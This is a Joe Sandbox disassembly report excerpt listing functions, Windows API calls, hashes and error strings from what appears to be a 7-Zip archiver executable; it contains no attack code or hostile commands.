                                                                • Instruction ID: fadd68b502be03939595194ea1bf6f093a351707566cccc94fd632787acc3bea
                                                                • Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                • Instruction Fuzzy Hash: 10F0E56239854887CB089F7999C13E821A1FB587D5F905439EF86CB601EB28CCD987A9
                                                                APIs
                                                                  • Part of subcall function 001189D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001189EA
                                                                • GetLastError.KERNEL32 ref: 0011CB49
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CloseErrorHandleLast
                                                                • String ID:
                                                                • API String ID: 918212764-0
                                                                • Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                • Instruction ID: e5ef7870663207a50753ed5d66466125fbdd1b3d22972d9dbcbad3c74e1cd4db
                                                                • Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                • Instruction Fuzzy Hash: 28D02B4079409486DB185EB94CC13B80081A728782F901439DD5BCA202EA188CCAA26E
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: memmove
                                                                • String ID:
                                                                • API String ID: 2162964266-0
                                                                • Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                • Instruction ID: d354f4513b73a9e4eaf09532b74c1215f99df3bcc787d49df98f5b09323b737a
                                                                • Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                • Instruction Fuzzy Hash: 89D05EA67406C886CA149B27D68151DA3219B88FD5708D024DF080B70ACF30CCE68740
                                                                APIs
                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001189EA
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                • Instruction ID: 5e44d6bdc65c71b8fbb7873dc9c1411b9ca9236e42c885f3ca65a471a8fd90a0
                                                                • Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                • Instruction Fuzzy Hash: 61D0A772601D48C1DB291F7EC8403741350A794B78F188320CAB04A2D0DF2489C78302
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                • Instruction ID: 5e7fadc06af984e4458e250ce5571e98be271f9d08aab51c1363130e12a69453
                                                                • Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                • Instruction Fuzzy Hash: 10C08C417C224802C90D622B2F863EC12020FDBBD1F4C4030DE480BB92DBA488F28740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                                                                • API String ID: 1534225298-798110030
                                                                • Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                • Instruction ID: 04831b51536a48782fbfee66047aa0ddef0ee4e96b7549dc71d561c78b0bf5eb
                                                                • Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                • Instruction Fuzzy Hash: 39C14E72218A40C6CB18EF11F8907DFB761F7D5B91F941139EA8A47A68DF78C48ACB40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                • Instruction ID: f974ce2c9adce09a11e570c2fac1e2a364e244f7784579ad416408fd28e4ebf5
                                                                • Opcode Fuzzy Hash: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                • Instruction Fuzzy Hash: A5D17F76208AC481CA38DF22E4606EE7760F7D6B85F465152EF9E57B25CF38C885CB04
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$free$memset$strlen$memmove
                                                                • String ID: data:
                                                                • API String ID: 527563900-3222861102
                                                                • Opcode ID: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
                                                                • Instruction ID: 1cae27982b3c76194e92c4b9b6c95976fb610aef0e6f39245c66f97c08efd02b
                                                                • Opcode Fuzzy Hash: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
                                                                • Instruction Fuzzy Hash: 27021332208A81D7DB18DF25E8903AE7761F3947C9F445115EE7A4B668DB38CA8EC740
                                                                APIs
                                                                • memset.MSVCRT ref: 0014FAAC
                                                                • free.MSVCRT ref: 0014FAC0
                                                                • free.MSVCRT ref: 0014FC43
                                                                  • Part of subcall function 00112130: malloc.MSVCRT ref: 00112134
                                                                  • Part of subcall function 00112130: _CxxThrowException.MSVCRT ref: 0011214F
                                                                  • Part of subcall function 0014F820: _CxxThrowException.MSVCRT ref: 0014F88D
                                                                • free.MSVCRT ref: 00150031
                                                                  • Part of subcall function 0014F8B8: memmove.MSVCRT ref: 0014F91E
                                                                  • Part of subcall function 0014F8B8: free.MSVCRT ref: 0014F926
                                                                  • Part of subcall function 0014F93C: memmove.MSVCRT ref: 0014F992
                                                                  • Part of subcall function 0014F93C: free.MSVCRT ref: 0014F99A
                                                                • free.MSVCRT ref: 001500EA
                                                                • free.MSVCRT ref: 001500F2
                                                                • free.MSVCRT ref: 00150101
                                                                • free.MSVCRT ref: 0015010A
                                                                • free.MSVCRT ref: 00150113
                                                                • free.MSVCRT ref: 00150121
                                                                • _CxxThrowException.MSVCRT ref: 00150184
                                                                Strings
                                                                • Internal file name collision (file on disk, file in archive):, xrefs: 0015015D
                                                                • Duplicate filename in archive:, xrefs: 00150149
                                                                • Duplicate filename on disk:, xrefs: 0014FCB4
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ExceptionThrow$memmove$mallocmemset
                                                                • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                                                                • API String ID: 3338823681-819937569
                                                                • Opcode ID: 17f6f14bac71751efe80d9b04e97d87e47ae6380bf435bb0da8020714141aded
                                                                • Instruction ID: d015d0ffac7539eae442a04a745aa8eee1dd4fe2347708f89b03fe40c4008fcd
                                                                • Opcode Fuzzy Hash: 17f6f14bac71751efe80d9b04e97d87e47ae6380bf435bb0da8020714141aded
                                                                • Instruction Fuzzy Hash: 1F12A273218A8487C724DF25E49065EB7A1F389BD0F515629EF9E47B68CF38D896CB00
                                                                APIs
                                                                • DeviceIoControl.KERNEL32 ref: 00118F7A
                                                                • DeviceIoControl.KERNEL32 ref: 0011905E
                                                                • DeviceIoControl.KERNEL32 ref: 001190B5
                                                                • DeviceIoControl.KERNEL32 ref: 001190F6
                                                                  • Part of subcall function 0011ABB0: GetModuleHandleW.KERNEL32 ref: 0011ABD1
                                                                  • Part of subcall function 0011ABB0: GetProcAddress.KERNEL32 ref: 0011ABE1
                                                                  • Part of subcall function 0011ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0011AC32
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                                                                • String ID: ($:
                                                                • API String ID: 4250411929-4277925470
                                                                • Opcode ID: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                • Instruction ID: 06a07fde06cdab245b741ab461c3c6b1522dba484843cb2f45ca45de317bb8dc
                                                                • Opcode Fuzzy Hash: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                • Instruction Fuzzy Hash: A451BD32608BC196CB24DF20F06079EB765F798764F54852AEB9A07B58EB38C4D9CB40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$DriveLogicalStrings
                                                                • String ID:
                                                                • API String ID: 837055893-0
                                                                • Opcode ID: 106ba36bd963fc83ddaed19d6b0af85a96b103604d59597e7e5fa49efd96df8e
                                                                • Instruction ID: 03fe0e8ba9c145e2f3df00add489ce5821425af50bfef622d7526d8a8a5b60c8
                                                                • Opcode Fuzzy Hash: 106ba36bd963fc83ddaed19d6b0af85a96b103604d59597e7e5fa49efd96df8e
                                                                • Instruction Fuzzy Hash: 2231B322701A4596DA38EA26AC513EA6251BB85BE8F888235DE5E47384DF38C9C6C310
                                                                APIs
                                                                • free.MSVCRT ref: 001196D1
                                                                • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00119723
                                                                • DeviceIoControl.KERNEL32 ref: 0011976C
                                                                • free.MSVCRT ref: 00119779
                                                                • free.MSVCRT ref: 00119796
                                                                • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 001197C4
                                                                • free.MSVCRT ref: 001197CD
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ControlDeviceFileHandleInformationmemmove
                                                                • String ID:
                                                                • API String ID: 2572579059-0
                                                                • Opcode ID: 66249682d96c9e811446979bc573c52628216d425e2c3449b3ad2fbb2eaf9277
                                                                • Instruction ID: 50db3ebb594c8812c76280100e1eb1887ea063a574194ce15682fc6abd618527
                                                                • Opcode Fuzzy Hash: 66249682d96c9e811446979bc573c52628216d425e2c3449b3ad2fbb2eaf9277
                                                                • Instruction Fuzzy Hash: 48317232215A4086C634AF11F9507AEB364E796BE0F588231EBF94BB95DF39C4D18B00
                                                                APIs
                                                                • FileTimeToLocalFileTime.KERNEL32 ref: 0011B12A
                                                                • FileTimeToSystemTime.KERNEL32 ref: 0011B13E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: Time$File$LocalSystem
                                                                • String ID: gfff
                                                                • API String ID: 1748579591-1553575800
                                                                • Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                • Instruction ID: 48e1f8587cd70306eb5c6de47945ebaecbe2aeb595dc46bf29f6edc1617c5df2
                                                                • Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                • Instruction Fuzzy Hash: D3519A93B182C08BD7198B3DD886BCDBFC1E3A5758F48822ADB5587785E36DC50AC721
                                                                APIs
                                                                  • Part of subcall function 0011B5B8: GetCurrentProcess.KERNEL32 ref: 0011B5C2
                                                                • GetSystemInfo.KERNEL32 ref: 0011B624
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CurrentInfoProcessSystem
                                                                • String ID:
                                                                • API String ID: 1098911721-0
                                                                • Opcode ID: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                • Instruction ID: eb949c017806f9991e201eddacfc11e7bcb90eae209f316d41dd9c9b71c0adce
                                                                • Opcode Fuzzy Hash: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                • Instruction Fuzzy Hash: 3EE0926662849483CB78EB08D9C26A9B361F3F4745FC05231E68A82E04DF2DC694CF00
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
                                                                • Instruction ID: 34afeae6880bda907862fecc5a575742f80bca13212b8b6d580c827bd778b7ad
                                                                • Opcode Fuzzy Hash: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
                                                                • Instruction Fuzzy Hash: 09C001FA2197408B874A8F2EA850818BBA0F788B907868029AA0CD3300E2358444CF24
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                • Instruction ID: 5797942ea65adce56c90a824850d2fca386f6f098a987d385fecf34cafa3ffd4
                                                                • Opcode Fuzzy Hash: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                • Instruction Fuzzy Hash: BFD1E322259580A1CA54FF31E4916AFA760F7D3780F545272FB9E93B29DF38C896CB04
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                • Instruction ID: 85fc0c530f494028100b1f165c064e279a7c6d5e2a7a531d472725374a5aeeab
                                                                • Opcode Fuzzy Hash: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                • Instruction Fuzzy Hash: B9913E32205B8486CB28EF36E0A4AAE6760F7D7F85F4A5561DB5E53721CF38C496C704
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: Process$AddressCurrentProc$fputs$HandleLibraryLoadModuleTimesmemset
                                                                • String ID: MCycles$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                                                • API String ID: 600854398-319139910
                                                                • Opcode ID: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
                                                                • Instruction ID: f6e5e1d4c9651505b9799bf5afc2a132641e97fd92c951c744c9a4761f45f98e
                                                                • Opcode Fuzzy Hash: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
                                                                • Instruction Fuzzy Hash: 48515B75305A85D1EE20DB65FC807EA6360F798B86F84402ADE5E4B769EF3CC54AC780
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ExceptionThrowmallocmemmove
                                                                • String ID:
                                                                • API String ID: 3352498445-0
                                                                • Opcode ID: 4d8d899cfb035eb7cde2558026b141a486167347833140dff5bfb46b77e2efc0
                                                                • Instruction ID: 6a9fb4c0f01a754b87054020e0f24a91f83fa64a656f2f9a464cc369ef1aed84
                                                                • Opcode Fuzzy Hash: 4d8d899cfb035eb7cde2558026b141a486167347833140dff5bfb46b77e2efc0
                                                                • Instruction Fuzzy Hash: 5BE19F3360869096CA34FE16E8811EEA760F796BD0F494236EF9D57B19CF78C886C740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove$ExceptionThrow
                                                                • String ID: incorrect update switch command$pqrxyzw
                                                                • API String ID: 3957182552-3922825594
                                                                • Opcode ID: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                • Instruction ID: 473aeb7476e0274a95548cf02e77a0edfa59783516a8c30bc4fa937093e4425b
                                                                • Opcode Fuzzy Hash: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                • Instruction Fuzzy Hash: 1681C23361499092CB25EF25E8907AEB320F7D9B84F454222EB9E47769DF38C996C740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove$wcscmp$ExceptionThrow
                                                                • String ID: Empty file path
                                                                • API String ID: 462375450-1562447899
                                                                • Opcode ID: 324205b252e1547a146404fd684db01b8975b469ffccedc29f4d10e25dad08a8
                                                                • Instruction ID: a1f892fd72bf797afce626276f0f3cb93a8acb43dcfa3dd64a95914593771d3d
